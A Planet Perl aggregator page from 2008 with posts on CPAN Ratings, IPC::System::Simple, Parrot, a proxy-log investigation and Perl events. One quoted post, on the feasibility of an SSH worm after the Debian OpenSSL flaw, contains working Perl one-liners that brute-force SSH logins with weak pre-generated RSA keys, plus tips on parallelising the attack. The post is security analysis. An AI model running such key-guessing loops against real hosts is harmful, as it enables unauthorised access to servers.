Planet Perl is an aggregation of Perl blogs from around the world. It's an often interesting, occasionally amusing, and usually Perl-related view of a small part of the Perl community. Posts are filtered on Perl-related keywords. The list of contributors changes periodically. You may also enjoy Planet Parrot or Planet Perl Six for more focus on their respective topics.
Planet Perl provides its aggregated feeds in Atom, RSS 2.0, and RSS 1.0, and its blogroll in FOAF and OPML.
There is life on other planets. A heck of a lot, considering the community of Planet sites forming. It's the Big Bang all over again!
This site is powered by Python (via planetplanet) and maintained by Robert and Ask.
Rate a CPAN module today!
One of the tough challenges facing someone new to Perl, or even someone who has been using it for years, is navigating the huge number of modules available via the Comprehensive Perl Archive Network (CPAN). CPAN is very comprehensive, with the little stats in the corner listing 6,500+ authors, 15,000+ distributions, and 55,000+ modules. That's a lot of code.
Unfortunately, being faced with so many options can be daunting. The search.cpan.org interface tries to show the most relevant results first, and seems to pay a good amount of attention to CPAN Ratings, and rightly so. In order for a module to be rated, someone has to get themselves a bitcard account (usually meaning they're a CPAN author themselves), use the module, and have the time and passion to write a review. This means that when such reviews do come in, they're highly relevant.
Unfortunately, not very many modules have been given reviews, and often those reviews go to modules that already have a substantial number, like DBI. Yet it's the modules that don't occur commonly in literature that need the reviews the most.
So, dear reader, today I wish to give you a quest. Go to CPAN Ratings, search for a module you use, and if it doesn't have a review, write one. That's it, just a single review. I don't care if you love the module or hate it, just let the world know how you feel. It can be a single sentence if you like. Heck, you can even critique one of my modules if you want. Just write a review.
If you don't know where to start, go to a piece of code you've worked on, or the tests for that code, and just look at the use lines. Trust me, you'll find something you care about. It may even be something that was so simple and easy to use that you had forgotten all about it.
Finally, if you're itching to start a new project, and need an idea, turn CPAN Ratings into a game, the same way it was done with the CPAN Testing Service and Kwalitee, or PerlMonks and their XP system. New reviews on a module give you +2 points, reviews on a module that already has reviews give you +1 point, each person who found your review useful gives you +1 point, and each person who didn't find your review useful gives you -1 point.
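If you want to keep score, the rules above fit in a few lines of Perl. A toy sketch (the scoring rules are from this post; the function itself is hypothetical):

sub review_score {
    my (%review) = @_;
    my $score = $review{first_review} ? 2 : 1;   # +2 for a module's first review, else +1
    $score += $review{useful_votes}     || 0;    # +1 per "useful" vote
    $score -= $review{not_useful_votes} || 0;    # -1 per "not useful" vote
    return $score;
}

# First review on a module, 3 useful votes, 1 not useful: 2 + 3 - 1 = 4
print review_score( first_review => 1, useful_votes => 3, not_useful_votes => 1 ), "\n";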
Posted: 15th May 2008.
Tags: cpan cpants gaming kwalitee perl programming
IPC::System::Simple released - Cross-platform, multi-arg backticks
One of my greatest itches with Perl is the difficulty of doing things correctly with the system() command, which allows one to run a process and wait for it to finish, and backticks (aka qx()), which allow one to run a process and capture its output.
It's not that these commands are hard to use. system("mount /dev/backup") and I've got my backup media mounted. my $config = qx(ipconfig) and I've got my Windows IP configuration. They're dead easy to use; it's just a pain to tell whether they worked.
After running, these commands set a special variable named $?, or $CHILD_ERROR if you've told perl to use English. This variable is designed to be "friendly" to "C programmers", who are familiar with the return value of the wait() system call. But who on earth wants to be familiar with the return value of wait()? After teaching thousands of people Perl over the last seven years, I've only had two people admit to knowing what the wait() return value looks like, and both of them needed therapy afterwards. It's a packed bit-string, and is grossly unfriendly for anyone to use in any language.
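For reference, here's the bit-fiddling that perldoc -f system recommends for decoding $?; the problem is that every caller is expected to repeat it:

if ($? == -1) {
    print "failed to execute: $!\n";
}
elsif ($? & 127) {
    printf "child died with signal %d, %s coredump\n",
        ($? & 127), ($? & 128) ? 'with' : 'without';
}
else {
    printf "child exited with value %d\n", $? >> 8;
}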
So, the usual state of affairs for many developers is they go through their day using system() and backticks and completely ignoring $?, because it's too hard. Then one day a disaster happens where they discover that all their backups are empty, or all their files are corrupted, or all their furniture has been repossessed, because their calls to system() have been failing for years, but nobody noticed because $? was too ugly to contemplate.
Those developers who have been through this process, or seen other people's lives ruined usually try to take a little more care. They recall that $? will be exactly zero if the process ran to completion and returned a zero exit status, which usually indicates success. Their code becomes littered with statements like $? and die $? or system(...) and die $?. That makes them feel warm and fuzzy until they discover it doesn't work. Their command may legitimately return a range of statuses to indicate success, and a whole bunch of things to indicate failure. Worse still, printing the contents of $? as an error message is worse than useless. Nobody understands what the hell it means; if you did, you wouldn't be printing it.
The end result of all this is that Perl sucks at something it's supposed to be good at; namely firing off system commands and being awesome for system administrators. It is this problem that IPC::System::Simple solves.
Put simply, if you're using IPC::System::Simple, you can replace all your calls to system() with run(), and all your calls to backticks with capture(), and it will all work the same way, except that you'll get incredibly useful messages on error. Got a funny exit status? It'll tell you what it is, and the command that caused it. Killed by a signal? You'll get not just the number, but its name, as well as whether it dumped core. Passed in tainted data? You'll get told what was tainted. And it gets better.
Let's say that you're using rsync to backup your files from an active filesystem. It exits with 0 for good, and 24 for "files went missing". On an active filesystem, files disappearing can be considered normal, so we'd like both of these to be considered 'fine'. Anything else, we'd like to get told. Can we do this with IPC::System::Simple? We sure can! Just provide the list of acceptable exit statuses as the first argument:
run( [0,24], "rsync ....")
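Putting it together, here's a minimal sketch of the module in use, based on the interface described above (see the documentation for the full details):

use IPC::System::Simple qw(run capture $EXITVAL);

run("mount /dev/backup");    # dies with a helpful message on any failure

# rsync: accept both 0 and 24 ("some files vanished") as success.
# The multi-argument form bypasses the shell, even on Windows.
run( [0, 24], "rsync", "-a", "/home/", "/backup/" );

my $config = capture("ipconfig");    # backticks, but error-checked
print "last command exited with $EXITVAL\n";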
IPC::System::Simple's run command also works the way the Perl security pages say system() should work. That is, when called with multiple arguments, it bypasses the shell. Perl's regular system(), when called with multiple arguments, will go and use the shell anyway on a Windows system, which is bad if you were trying to avoid shell meta-characters.
You can get the same shell-bypassing behaviour with capture(); just pass it in multiple arguments and you're done. This even works under Windows, which normally doesn't even support shell-bypassing pipes, let alone checking your command's return values and formatting your errors afterwards. You even get the full 16-bit Windows exit value made available to you, which is something $? and its dark terrors will never give you.
Best of all, installing IPC::System::Simple is a breeze. It's pure perl, with no dependencies on non-core modules. Even if you have no other way of installing modules, you can just copy the .pm file into an appropriate directory and you're done.
Don't put up with the tragedies and uncertain futures that system() and backticks can bring. Use IPC::System::Simple and make handling your system interactions correctly a painless experience.
Posted: 13th May 2008.
Tags: ipc-system-simple perl programming sysadmin
IPC::System::Simple 0.08 released
Hot on the heels of v0.07, I've released IPC::System::Simple v0.08. The most important changes are documentation fixes thanks to Matt Kraai, a mistake fixed in one of my tests, and better support for taint under Perl 5.6.x.
You can grab the new release from a CPAN mirror near you once it finishes indexing.
Posted: 13th April 2008.
Tags: ipc-system-simple perl
IPC::System::Simple 0.07 released
The new version provides better diagnostics when used with tainted data, better testing under some more exotic systems, and a few documentation tweaks. You can grab the new version from a CPAN mirror near you (once it finishes indexing), and if you like the module, you can even vote for it using CPAN ratings.
Posted: 12th April 2008.
Tags: ipc-system-simple perl
RFC: lethal - lexical exceptions for Perl
I've been scratching a long-time itch of mine, which is that while Perl allows me to use Fatal to get subroutines and built-ins to throw exceptions on failure, such a change was always done on a package-wide, rather than lexical (block) basis.
However with Perl 5.10 we have the ability to fix that, and I've put together a proof-of-concept module that enables exception-throwing subroutines on a lexical basis.
I'm looking for input into its naming, interface, and concept in general. Rather than filling up a blog post with it, you can read the node on PerlMonks.
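To make the idea concrete, here's a hypothetical illustration of lexically scoped exception-throwing; the real interface and naming are exactly what the RFC is asking about:

{
    use lethal qw(open);                  # hypothetical: in effect for this block only
    open my $fh, '<', 'missing.txt';      # would throw an exception on failure
}

# Outside the block, open behaves as it always has.
open my $fh, '<', 'missing.txt' or warn "plain false return: $!";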
Posted: 10th March 2008.
Tags: exceptions lethal perl perl510
Intruder Alert - Tracking down a rogue connection
The hosts I administer look through their logfiles each hour, looking for things that are out of the ordinary, and mailing them to me. This is where my uncanny ability to remember leap-seconds comes from; it's not because I actually care about things, but because I'll get an e-mail saying that a host suddenly found itself a whole second out of sync with some incredibly accurate clock somewhere. Lucky me.
Most things don't end up in my log digests, because most things are boring. The things I do see are things that I either care about, or have never seen before.
A few days ago I got an e-mail that one machine was trying to contact a particular address, 172.16.45.35. What made this noteworthy is that address is unroutable. It's a reserved, private address space. It doesn't go anywhere on the Internet, and it's not used by us internally, so there should be no reason to try and contact it. The connection indicated it would have been an outgoing web request, and since I was busy working on other things, I assumed that some other fool had set up their system incorrectly, and thought nothing of it. People leave references to their own internal sites in documents all the time.
A few days later I got another e-mail, same result. And then another, the next day, and another. Each time I looked a little closer. About the same time each day, a few attempts to contact this address, and then nothing.
Today, this bothered me. What if we're seeing these packets because there's something running on this machine that shouldn't be? So I go to my proxy logs, and do a search for the address. Nothing matches.
Hmm, that's odd. Let's see what's in our name-server cache, since the address is probably the result of a name lookup. kill -INT on your named will let you see its memory cache, a great trick to remember. Nothing in here, either, but it's now been hours since I got the mail, so the record may well have expired.
What's odd about this connection is that it seems to happen around lunchtime, but not every day, and not always at exactly the same time, and sometimes it misses days, so I don't really know if or when I'll ever see it again. Rather than futilely trying to find it minutes after it occurs, I figure that I'll set something running to catch it in the act:
lsof -r1 +c0 -ni@172.16.45.35 | grep --line-buffered -v ======= | tee 172.16.45.35-watch
Every second I'll look for anything involving that address using lsof, remove the boring separators, and chuck it into a file and STDOUT. The --line-buffered option is important so that grep doesn't delay the flow of data.
While I've got that running, I whip up a bit of perl to watch the output, and grab fingerprints of the process when we spot it; most of the contents of the relevant entry in /proc will do nicely.
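The watcher is nothing fancy. A hypothetical sketch of the sort of thing I mean, reading the lsof output on STDIN (field positions assume lsof's default columns):

#!/usr/bin/perl
# Hypothetical watcher: read lsof's output and snapshot /proc/<pid>
# before the short-lived process can disappear.
use strict;
use warnings;
use File::Copy qw(copy);

while (my $line = <STDIN>) {
    my ($command, $pid) = (split ' ', $line)[0, 1];   # lsof: COMMAND PID ...
    next unless defined $pid and $pid =~ /^\d+$/;     # skips lsof's header line

    my $dir = "suspect-$pid-" . time();
    next unless mkdir $dir;
    # These vanish the instant the process exits, so grab them now.
    for my $file (qw(cmdline status environ maps)) {
        copy("/proc/$pid/$file", "$dir/$file");       # best effort
    }
    warn "caught $command (pid $pid): $line";
}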
I leave my tools to run in a screen session (which will preserve them even if my terminal goes away), make dinner, have an extremely nice home-brew beer, and watch some TV. In this case, House MD.
As is common in many episodes of House, the patient is sick with a disease that should have been obvious, since they test for that particular disease in every single episode (except this one). Not long afterwards, it dawns upon me what my problem may be.
I go to the proxy logs, and I look up all the addresses of all the sites accessed today:
perl -pe'my @f = split(/\s+/,$_); $_ = $f[6]; s{^http://}{}; s{[:/].*}{}; $_ .= "\n"' access.log | sort | uniq | perl -MIO::Handle -MNet::DNS -e'my $dns = Net::DNS::Resolver->new; STDOUT->autoflush(1); while (<>) { chomp; print "== $_ ==\n"; my $q = $dns->search($_); if ($q) { foreach my $rr ($q->answer) { print $rr->address,"\n" if $rr->type eq "A" } } else { warn $dns->errorstring; } }' | tee /tmp/squid-dns
Sure enough, after a few moments my answer pops out! The address proof.smh.com.au resolves to 172.16.45.35. SMH is the Sydney Morning Herald, and it looks like some of their pages refer to an internal machine, which my reporting system is dutifully reporting as odd. Sure enough, all the dates and times in the squid logfiles match up nicely with the packet intercept reports I was sent.
The reason it wasn't showing up when I first searched is that squid only records IP addresses when it needs to make a direct connection. In this case, it tried to make the connection and failed, but rather than giving up it then proceeds to try and hand the problem off to an upstream cache, and that's what gets reported in the logfile.
This is good for me, since it means that the odd connections really are what I thought they would be, and not a sign of unwanted activity on one of my machines. I'm doubly glad because it would be especially embarrassing to find a rootkit that's so badly written that it tries connecting to a completely unroutable address.
Posted: 21st November 2007.
Melbourne Perl Mongers
Melbourne Perl Mongers is meeting tomorrow (Wednesday) night, and both Rick Measham and I will be presenting.
6:30pm Wednesday 8th August
Editure
Level 8
14 Blackwood St
North Melbourne
Effective Procrastination with HiveMinder
If you're like most people, you've got dozens of things that need doing: work, shopping, chores, programming, hobbies, tax, holidays, bills, and so on. You may have tried to keep a to-do list, but found it rapidly grew to the point of being unmanageable.
Paul Fenwick will demonstrate the use of the free HiveMinder.com to-do service to both manage tasks and to procrastinate effectively, allowing you to focus only on the tasks that really need to be done. We'll see how to manage tasks via the web, via e-mail, and how to be really efficient via instant messenger.
To conclude, we'll see how it's possible to add new features to HiveMinder and some tricks and tips for doing so.
Microblogging with Jaiku and Net::Jaiku (Rick Measham)
Net::Jaiku - an introduction to microblogging and lifestreaming, plus a bonus: using microblogging as a development tool.
Posted: 9th October 2007.
Tags: hiveminder jaiku melb.pm melbourne perl presentations procrastination talks todo
Perl tips via Atom
For all those people who'd prefer yet-another-feed over yet-another-mailing-list, Perl Training Australia's Perl tips are now available via Atom and FeedBurner as well as via e-mail. RSS will follow if anyone asks nicely.
Posted: 16th September 2007.
Tags: atom perl syndication tips
SweeperBot - Play MineSweeper Automatically!
My latest project has finally been launched. See SweeperBot.org for the latest in Windows productivity software. Even if you don't use Windows, do watch the 50 second video on the site; it represents a whole day of my life spent poorly, and I think it's hilarious. ;)
For anyone wondering, yes, it's written in Perl. It uses PAR/PP to package the whole thing up into a single Windows executable. Yes, it plays MineSweeper acceptably well, thanks to Audrey Tang showing me the cheat codes at OSDC a few years back. ;)
Posted: 19th May 2008.
Tags: games minesweeper perl sweeperbot windows
IPC::System::Simple v0.06
IPC::System::Simple v0.06 has been released, and should be hitting a CPAN mirror near you shortly. The new release includes:
Posted: 6th September 2007.
Tags: ipc-system-simple perl win32
They were walking to the Hemlock, the Rooster and the Mice, and the Mice kept looking at one another, questioning.
"We don't know what the future holds, do we?" said Chauntecleer. The Mice all shook their heads. They knew very little of anything. "If," said Chauntecleer, "I say, if I don't come back again, then you must make this food to last a long, long time. I trust your prudence, don't I?" he asked, and they nodded automatically, but their eyes were very big. "And I trust your integrity, right?" They nodded. "And you are mature, now, and I respect your maturity, isn't that so?" Poor Mice, they nodded and nodded, and they blinked, and they nodded. They looked afraid. "Good," said Chauntecleer. "I know I won't be disappointed.
In this way he gave each Mouse a manhood. They couldn't talk to him just now, having so much to turn over in their minds. But neither did they cry.
— The Book of Sorrows, by Walter Wangerin Jr.
On behalf of the Parrot team, I'm proud to announce Parrot 0.6.2 "Reverse Sublimation." Parrot is a virtual machine aimed at running all dynamic languages.
Parrot 0.6.2 is available via CPAN (soon), or follow the download instructions. For those who would like to develop on Parrot, or help develop Parrot itself, we recommend using Subversion or SVK on our source code repository to get the latest and best Parrot code.
Parrot 0.6.2 News:
Gracias to all our contributors for making this possible, and our sponsors for supporting this project. The next scheduled release will occur on 17 June 2008.
Enjoy!
I’m on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies “the easy stuff” — greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. — in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend — and, key point, off your SpamAssassin setup. ;)
Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they’re making it available as a download at http://mailchannels.com/download/. Apparently: “it’s free for low-volume use, but high volume users will need a license key.”
Anyway, take a look, if you’re interested. I think it’s pretty cool. (And I’m not just saying that because I’m on their tech advisory board. ;)
Great article from LWN.net regarding the Debian OpenSSL vulnerability:
It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities — typically distributions, but sometimes users — to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.
Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution’s package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.
+1.
Every year, at OSCON, the White Camels are presented.
If you look at the previous winners, you'll notice that these are mostly unsung heroes, like previous awardee Eric Cholet, the human moderator of so many Perl mailing lists, or Jay Hannah, one of the people running pm.org (if you ever created/maintained a pm group, chances are that Jay walked you through the process).
Some of these people may be well known, like Allison Randal or Randal Schwartz, while others may be complete strangers to at least part of the globe, like Josh McAdams or Jay. Some of them may be extreme Perl hackers who created the original JAPH, but they actually received this award as a recognition for their community contributions to Perl.
That's not to say a great hacker can't receive the award, but you don't have to be one in order to be eligible.
That being said, the nomination process for the 2008 White Camels is now open.
If you think there's someone who deserves a White Camel, this is the time for you to send in your nominations. Send them to jose@pm.org, if possible with a subject along the lines of "White Camel Nomination :: $name". Make sure you properly identify the nominee and tell us why you think that's a worthy nomination.
Don't go thinking "nah, somebody else will do it" because: a) everybody else may be thinking the same, and b) you may state your case differently than the next person.
We'll be receiving nominations until June 11, 2008, by midnight, but don't wait up or you'll forget. Do it now!
Just a gentle reminder to folks: you can email me about my CPAN modules as much as you want. I don't mind. There is, however, an excellent chance that you'll never get a reply. I mean to reply, but I forget, get distracted, whatever. If it's a question about a module or general discussion, that's OK. I might remember to answer. I might not. However, if it's a bug or feature request, please put those things in the RT queue for the CPAN module and even though there's just as great a chance that I'll forget, at least RT won't forget and I'll have a better chance of seeing it later. More importantly, someone else has a better chance of seeing it later.
I have several bugs that I've cleaned up on RT because I was going through and paying attention to them. That doesn't happen with email.
PS: And please don't tell me to organize my email better. I already have tons of organization in my email, but most of us already know the old saw about too many levels of abstraction. Same thing. I'm just not an email guy.
Aaron Trevena wants to get the Perl 5 wiki up to 1,000 pages, and it's almost at 900.
The Most Wanted Pages is a great place to start. Pick a page that some other page has linked to, and create it. It's that simple.
I decided to work on my logic programming module again today. I've eradicated lots of bugs (and probably found lots more). Here's a basic demo:
use AI::Perlog ':all';

my $data = AI::Perlog->new( { predicates => [qw/beautiful likes shiny/] } );

$data->add_facts(
    [qw/ beautiful people /],
    [qw/ shiny Firefly /],
    [qw/ shiny Kaylee /],
    [qw/ likes ovid whiskey /],
    [qw/ likes andy whiskey /],
);

# declare a logic variable
var my $stuff;

$data->add_rules(
    rule( 'likes', 'ovid', $stuff )
        ->if( [ 'shiny', $stuff ] ),
);

var my $what;
my $results = $data->query( 'likes', 'ovid', $what );
while ($results->next) {
    print 'Ovid likes ', $what->value, "\n";
}

__END__
Ovid likes whiskey
Ovid likes Firefly
Ovid likes Kaylee
Note how we're pulling data not just from the fact that 'ovid likes whiskey', but also from the rule 'ovid likes shiny stuff' and both 'Firefly' and 'Kaylee' are shiny stuff. Making logical inferences like this is what logic programming is all about!
It's not even close to being releasable due to lots of bugs and no documentation, though. For example, the append/3 predicate is horribly broken and there are lots of problems with undefined variables. There also appear to be problems in the backtracking engine.
I thought I was over my jetlag, but instead I woke up at 4am this morning. This was a perfect excuse to head over to Tsukiji for sushi for breakfast. So good!
The first talk this morning was Kang-min Liu's "JavaScript::Writer fun". "my new toy". "You write Perl, Perl writes JavaScript". AUTOLOAD magic. "The stock price on Prototype.js is going down"
Daisuke Murase (typester) - "FormValidator::Assets", which looked interesting.
Hiroshi Sakai (ziguzagu) - "OpenSource TypePad Mobile" was all about hacking Atom and Movable Type open source, including HTML::Split, teasing about HTML::MobileFilter, and open emoticons.
Masahiro Nagano (kazeburo) - "memcached in mixi" gave general details about memcached use and then went into details at mixi: 94% cache hit rate, 223 GB cache in total, maxing out at 15,000 requests per second at 400Mbps. Interestingly, they upped the number of buckets in memcached's internal hash table from 16 to 25, as they have large objects.
Chia-liang Kao - "Branch Managment with SVK 2.2". Workflow for feature-based development - features or bugfixes handled in branches, then merged to RC (QA, testing) and then merged to trunk and live. There is a new svk branch command.
Tatsuhiko Miyagawa - "20 modules I haven't yet talked about", renamed to 10 modules: HTTP::ProxyPAC (Spidermonkey, argh), pQuery (no capitalization: 'pQuery::DOM'), PHP::Session ("I've actually never used it"), autobox::DateTime::Duration, Time::Duration::Parse, Encode::DoubleEncodedUTF8 ("useful and evil"), URI::Find::UTF8, Lingua::JA::Hepburn::Passport, LWP::UserAgent::Keychain, XML::Liberal ("People are stupid. Cloud is full of crap. Software can fix it"). "I want to hear your version of this talk if you have >10 modules on CPAN".
We had a quick lunch - curry-don, mmm.
Jesse Vincent - Everything but the secret sauce Find bugs faster: TAP::Harness::Parallel, TAP::Harness::Remote, TAP::Harness::Remote::EC2, Carp::REPL. Build web apps: Template::Declare (soon: compile to JavaScript), CSS::Squish. Ship software: App::ChangeLogger, Shipwright (build all dependencies, everything above libc - platform neutral source distribution or platform specific binary distribution). Get input from users: Date::Extract, the feedback box. Own the Inbox: Net::IMAP::Server, with.hm.
Then we ate Yahoo! Japan snacks. Really.
Casey West - "Build Domain Specific Languages with Perl" testing DSL along the lines of "Title should be {'Twitter'}".
Jeff Kim - "Gungo and cloud computing, a scalable crawling and processing framework" deployed on EC2 and S3 and a happy user.
Then the wrapup started - Jose Castro told us what he had learned in Tokyo (he can stop Japanese babies crying), Schwern told us that Perl is a zombie (oh no wait, it was really about decentralising and caring about people who aren't other programmers) and then it was over. Many thanks for an excellent conference!
Today's Parrot speedups add up to almost 50%. That's right -- a little rethinking nearly doubled the benchmark speed.
Patrick said he'd work on this a little bit, but I ran a couple of quick tests. The NQP grammar included with Parrot 0.5.2 builds in 5.575 wallclock seconds with today's new Parrot. It built in 12.956 seconds with Parrot 0.5.2. Today's version of the grammar failed to build with Parrot 0.5.2 after 20.636 seconds. It builds with today's Parrot in 16.322 seconds.
Those numbers aren't scientific (despite all those decimal points of precision), but they're roughly correct. I trust Callgrind's accuracy more for comparison. Parrot 0.5.2 spent 21,285,518,488 cycles building its grammar. New Parrot spent 9,189,968,377 cycles building the grammar for 0.5.2.
The grammar as of r27568 is 2332 lines long; it was 806 lines long in Parrot 0.5.2. It costs 24,377,028,231 cycles to build in today's Parrot. Doubling the speed in six months is good. Doubling the speed while adding so many new features is even better. Also keep in mind that most of the optimizations were in the core of Parrot, not in NQP or PIR. We don't yet have a good way to profile PIR, so we've performed very few optimizations at that level. There are likely several decent improvements lying in wait.
If there's sufficient interest, I'll explain today's two optimizations in a future post.
As Eric quoted me in the Revision Control for all of CPAN proposal, "I'm looking forward to it."
Having the history of a distribution available publicly in a format which allows (or encourages) a history-like view is a great thing. That said, it's not an easy or simple problem to solve, but in my mind the benefits are not primarily offering public revision control to authors. (I can imagine offering read-only access.) The primary benefit is offering Backpan in a form much easier to use than juggling tarballs.
That wouldn't be as useful if all authors made their complete version control histories public, but first things first.
Douglas Crockford of JSON fame has written a beautiful book about JavaScript.
First of all - at only 170 pages it is short. Even though some of the key points are repeated through the book it's dense with information. You don't need any JavaScript experience, but it's not a "beginning programming" book so if you haven't been programming before this is not the right book for you.
Reading this book a couple of times will give you an appreciation for the JavaScript language that you almost certainly didn't have before. It'll give you tools to write better programs that you and others will actually be able to maintain over time.
I've learned lots of little things that I maybe knew from experience, but now I know and I know why.
This book will help you battle with JavaScript rather than against it.
(this review was also posted on amazon.com)
After reading half the book I went and bought a bunch of extra copies and had them sent to people I work with who are working with JavaScript.
Just announced on the TPF news site, a huge donation to TPF to fund Perl 6 development:
On May 14, 2008, The Perl Foundation received a philanthropic donation of US$200,000 from Ian Hague. Mr. Hague is a co-founder of Firebird Management LLC, a financial fund management company based in New York City. This donation was the result of extensive discussions between Mr. Hague, The Perl Foundation and a Perl community member who wishes to remain anonymous.
The purpose of the donation is to support the development of Perl 6, the next generation of the Perl programming language. Roughly half of the funds will be used to support Perl 6 developers through grants and other means. The balance of the funds will be used by The Perl Foundation to develop its own organizational capabilities. This will allow The Perl Foundation to pursue additional funding opportunities to support Perl 6 development. Mr. Hague wants his contribution to be seed funding in that effort.
The Perl Foundation thanks Mr. Hague in the deepest possible terms. This donation is unprecedented in its generosity, scope and vision, and it is precisely what was needed at this juncture in the development of Perl 6. We look forward to the greatest of successes with Perl 6, and this contribution is a key part of making that happen. The Perl Foundation will communicate further developments with the Perl community and Mr. Hague as the pieces of this plan are executed.
Thank you to Mr. Hague for supporting Perl 6's continued development.
Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:
when doing this, connecting to localhost:
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'
4.63user 3.06system 0:19.54elapsed
i.e. about 50 per second
when connecting remotely over the internet (ping RTT is ~60ms):
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'
1.10user 0.60system 0:35.15elapsed
i.e. about 6 per second over the internet.
Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
i.e. it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.
So given that:
- RSA is the default if you don’t specify for ssh-keygen
- 99.99% of people use x86
- PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild
then:
Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.
If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.
(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)
Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:
SSL Certificate Reissuance
If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:
- GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
- Thawte: Here (Available throughout the lifetime of the certificate.)
- VeriSign: Unknown
- GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)
- ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
- CAcert: This is a cost-free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment certificate generation will take some time, as it seems that many users are re-issuing their certificates.
- Digicert: Login to Your account to re-issue (free).
This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.
Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the “buy” link for reissuance insurance — the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)
Here follows quick writeups of the talks I attended.
Jose Castro gave a "less than 10 minutes" Perl Foundation talk.
